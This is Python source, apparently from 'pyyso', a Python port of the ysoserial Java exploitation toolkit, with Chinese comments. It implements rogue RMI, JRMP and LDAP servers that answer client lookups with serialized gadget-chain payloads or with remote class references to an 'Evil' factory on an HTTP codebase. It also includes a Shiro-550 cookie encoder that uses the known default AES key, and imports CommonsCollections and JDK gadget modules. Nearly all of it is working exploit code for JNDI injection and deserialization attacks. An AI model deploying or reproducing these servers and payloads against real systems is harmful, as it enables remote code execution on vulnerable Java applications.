import socket
from threading import Thread
from pyyso.misc.ReferenceWrapper_Stub import *
from pyyso.misc.Lease import *


class RMIServer():

    def __init__(self, serobj: bytes, ip: str = "0.0.0.0", port: int = 1099, refip: str = "0.0.0.0",
                 refport: int = 51510):
        self.serobj = serobj
        self.ip = ip
        self.port = port
        self.refip = refip
        self.refport = refport

    def __serve(self):
        s = socket.socket()
        s.bind((self.ip, self.port))
        s.listen(5)
        while True:
            # 接受客户端
            conn, addr = s.accept()
            # 接受JRMP请求
            conn.recv(7)
            # 返回确认信息
            conn.send(b"\x4e\x00\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x00\x00\xdd\xa6")
            # 接收客户端请求的一个字节
            conn.recv(1)
            # 再接收一个字节，这个字节标志了客户端请求报文剩下的长度
            len1 = conn.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len1 = ord(len1)
            # 接收剩下的请求报文
            conn.recv(len1 + 4)
            # 接收调用报文
            conn.recv(43)
            # 接收客户端请求的一个字节
            len2 = conn.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len2 = ord(len2)
            # 接收剩下的请求报文
            conn.recv(len2)
            # 返回Refernce_Wrapper_Stub
            conn.send(RefeneceWrapper_Stub(self.refip, self.refport))
            # 回到registry这里，接收一个字节的JRMI Ping
            conn.recv(1)
            # 发送一个字节的JRMI PingAck
            conn.send(b"\x53")
            # 接收一个字节的JRMI DgcAck
            conn.recv(1)
            # 关闭链接
            conn.close()

    def __serve2(self):
        # 新建一个socket
        s2 = socket.socket()
        s2.bind((self.refip, self.refport))
        s2.listen(5)
        while True:
            conn2, addr2 = s2.accept()
            # 接收JRMP请求
            conn2.recv(7)
            # 返回确认信息
            conn2.send(b"\x4e\x00\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x00\x00\xdd\xa6")
            # 接收客户端请求的一个字节
            conn2.recv(1)
            # 再接收一个字节，这个字节标志了客户端请求报文剩下的长度
            len1 = conn2.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len1 = ord(len1)
            # 接收剩下的请求报文
            conn2.recv(len1 + 4)
            # 接收451个字节，一般是定长信息，如果有需要可以设置成更小的值
            conn2.recv(451)
            # 发送信息
            conn2.send(Lease())
            # 接收41个字节的数据
            conn2.recv(41)
            # 发送数据
            conn2.send(self.serobj)
            # 关闭链接
            conn2.close()

    def run(self):
        self.thread1 = Thread(target=self.__serve)
        self.thread1.start()
        self.thread2 = Thread(target=self.__serve2)
        self.thread2.start()



import socket
from threading import Thread


# 构造报文用的函数
def addAttribute(attrName, attrValue):
    msg = b""
    if len(attrValue) >= 0xFF:
        len1 = len(attrValue).to_bytes(2, byteorder="big")
        msg = b"\x04\x82" + len1 + attrValue + msg
    else:
        len1 = len(attrValue).to_bytes(1, byteorder="big")
        msg = b"\x04" + len1 + attrValue + msg
    if len(msg) >= 0xFF:
        len2 = len(msg).to_bytes(2, byteorder="big")
        msg = b"\x31\x82" + len2 + msg
    else:
        len2 = len(msg).to_bytes(1, byteorder="big")
        msg = b"\x31" + len2 + msg
    len3 = len(attrName).to_bytes(1, byteorder="big")
    msg = b"\x04" + len3 + attrName + msg
    if len(msg) >= 0xFF:
        len4 = len(msg).to_bytes(2, byteorder="big")
        msg = b"\x30\x82" + len4 + msg
    else:
        len4 = len(msg).to_bytes(1, byteorder="big")
        msg = b"\x30" + len4 + msg
    return msg


class LdapSerialized():
    """
    返回序列化数据的ldap服务器
    """

    def __init__(self, serobj: bytes, ip: str = "0.0.0.0", port: int = 1389):
        self.serobj = serobj
        self.ip = ip
        self.port = port

    def __serve(self):
        s = socket.socket()
        s.bind((self.ip, self.port))
        s.listen(5)
        while True:
            # 接受客户端
            conn, addr = s.accept()
            # 接受JNDI请求
            conn.recv(14)
            # 返回确认信息
            conn.send(b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00")
            # 接收客户端请求的一个字节
            conn.recv(1)
            # 再接收一个字节，这个字节标志了客户端请求报文剩下的长度
            len1 = conn.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len1 = ord(len1)
            # 接收剩下的请求报文
            data = conn.recv(len1)
            # 获取字符串的长度
            len2 = data[6]  # 字节串里面截取出来自动变成数
            # 保存请求的类名称
            classname = data[7:7 + len2]
            # 构造报文
            serobj = self.serobj
            msg1 = addAttribute(b"javaSerializedData", serobj)
            msg2 = addAttribute(b"javaClassName", b"java.lang.String")
            msg = msg2 + msg1
            if len(msg) >= 0xFF:
                len3 = len(msg).to_bytes(2, byteorder="big")
                msg = b"\x04" + len2.to_bytes(1, byteorder="big") + classname + b"\x30\x82" + len3 + msg
            else:
                len3 = len(msg).to_bytes(1, byteorder="big")
                msg = b"\x04" + len2.to_bytes(1, byteorder="big") + classname + b"\x30" + len3 + msg
            if len(msg) >= 0xFF:
                len4 = len(msg).to_bytes(2, byteorder="big")
                msg = b"\x02\x01\x02\x64\x82" + len4 + msg
            else:
                len4 = len(msg).to_bytes(1, byteorder="big")
                msg = b"\x02\x01\x02\x64" + len4 + msg
            if len(msg) >= 0xFF:
                len5 = len(msg).to_bytes(2, byteorder="big")
                msg = b"\x30\x82" + len5 + msg
            else:
                len5 = len(msg).to_bytes(1, byteorder="big")
                msg = b"\x30" + len5 + msg
            # 发送
            conn.send(msg)
            # 结束通信，这是必须的
            conn.send(b"\x30\x0c\x02\x01\x02\x65\x07\x0a\x01\x00\x04\x00\x04\x00")
            conn.recv(36)

    def run(self):
        self.thread = Thread(target=self.__serve)
        self.thread.start()


class LdapRemoteRef():
    """
    返回remote reference的ldap服务器
    其中参数javaFactory是放置在http服务器上的类名
    """

    def __init__(self, javaCodeBase: str = "http://127.0.0.1:8088/", javaFactory: str = "Evil",
                 javaClassName: str = "java.lang.String", ip: str = "0.0.0.0", port: int = 1389):
        self.javaCodeBase = javaCodeBase.encode()
        self.javaFactory = javaFactory.encode()
        self.ip = ip
        self.port = port
        self.javaClassName = javaClassName.encode()

    def __serve(self):
        s = socket.socket()
        s.bind((self.ip, self.port))
        s.listen(5)
        while True:
            # 接受客户端
            conn, addr = s.accept()
            # 接受JNDI请求
            conn.recv(14)
            # 返回确认信息
            conn.send(b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00")
            # 接收客户端请求的一个字节
            conn.recv(1)
            # 再接收一个字节，这个字节标志了客户端请求报文剩下的长度
            len1 = conn.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len1 = ord(len1)
            # 接收剩下的请求报文
            data = conn.recv(len1)
            # 获取字符串的长度
            len2 = data[6]  # 字节串里面截取出来自动变成数
            # 保存请求的类名称
            classname = data[7:7 + len2]
            # 构造报文
            msg1 = addAttribute(b"javaFactory", self.javaFactory)
            msg2 = addAttribute(b"objectClass", b"javaNamingReference")
            msg3 = addAttribute(b"javaCodeBase", self.javaCodeBase)
            msg4 = addAttribute(b"javaClassName", self.javaClassName)
            msg = msg4 + msg3 + msg2 + msg1
            len3 = len(msg).to_bytes(1, byteorder="big")
            msg = b"\x04" + len2.to_bytes(1, byteorder="big") + classname + b"\x30\x81" + len3 + msg
            len4 = len(msg).to_bytes(1, byteorder="big")
            msg = b"\x02\x01\x02\x64\x81" + len4 + msg
            len5 = len(msg).to_bytes(1, byteorder="big")
            msg = b"\x30\x81" + len5 + msg
            # 发送
            conn.send(msg)
            # 结束通信，这是必须的
            conn.send(b"\x30\x0c\x02\x01\x02\x65\x07\x0a\x01\x00\x04\x00\x04\x00")
            conn.recv(36)

    def run(self):
        """
        使用这个启动服务器
        """
        self.thread = Thread(target=self.__serve)
        self.thread.start()



import base64
import uuid
from Crypto.Cipher import AES
def shiroEncode(serobj:bytes, key: bytes = b'kPH+bIxk5D2deZiIxcaaaA==')->bytes:
    """
    生成 shiro-550 poc
    :param serobj: 序列化对象
    :param key: key
    :return: base64编码字节串
    """
    key=base64.b64decode(key)
    BS=len(key)
    IV=uuid.uuid4().bytes
    #计算余数，补充余数数量的余数字符作为padding
    pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS).encode()
    cryptor = AES.new(key,AES.MODE_CBC, IV)
    ciphertext = cryptor.encrypt(pad(serobj))
    return base64.b64encode(IV+ciphertext)


from pyyso.yso.urldns import *
from pyyso.yso.cc1 import *
from pyyso.yso.cc2 import *
from pyyso.yso.cc3 import *
from pyyso.yso.cc4 import *
from pyyso.yso.cc5 import *
from pyyso.yso.cc6 import *
from pyyso.yso.cc7 import *
from pyyso.yso.jdk7u21 import *
from pyyso.yso.jdk8u20 import *
from pyyso.yso.clazz import *
from pyyso.yso.cb1v183 import *
from pyyso.yso.cb1v192 import *
from pyyso.yso.jrmpclient import *
from pyyso.yso.beanfactory import *



import socket
from threading import Thread


class JRMPListener():
    def __init__(self, serobj: bytes, ip: str = "0.0.0.0", port: int = 789):
        self.serobj = serobj
        self.ip = ip
        self.port = port

    def __serve(self):
        s = socket.socket()
        s.bind((self.ip, self.port))
        s.listen(5)
        while True:
            # 接受客户端
            conn, addr = s.accept()
            # 接受JRMP请求
            conn.recv(7)
            # 返回确认信息
            conn.send(b"\x4e\x00\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x00\x00\xdd\xa6")
            # 接收客户端请求的一个字节
            conn.recv(1)
            # 再接收一个字节，这个字节标志了客户端请求报文剩下的长度
            len1 = conn.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len1 = ord(len1)
            # 接收剩下的请求报文
            conn.recv(len1 + 4)
            # 接收客户端请求的一个字节
            len2 = conn.recv(1)  # 收到的是字节串，要转化成数
            # 把字节串转化成数
            len2 = ord(len2)
            # 接收剩下的请求报文
            conn.recv(len2)
            # 接收451个字节，一般是定长信息，如果有需要可以设置成更小的值
            conn.recv(451)
            conn.send(self.serobj)

    def run(self):
        self.thread = Thread(target=self.__serve)
        self.thread.start()
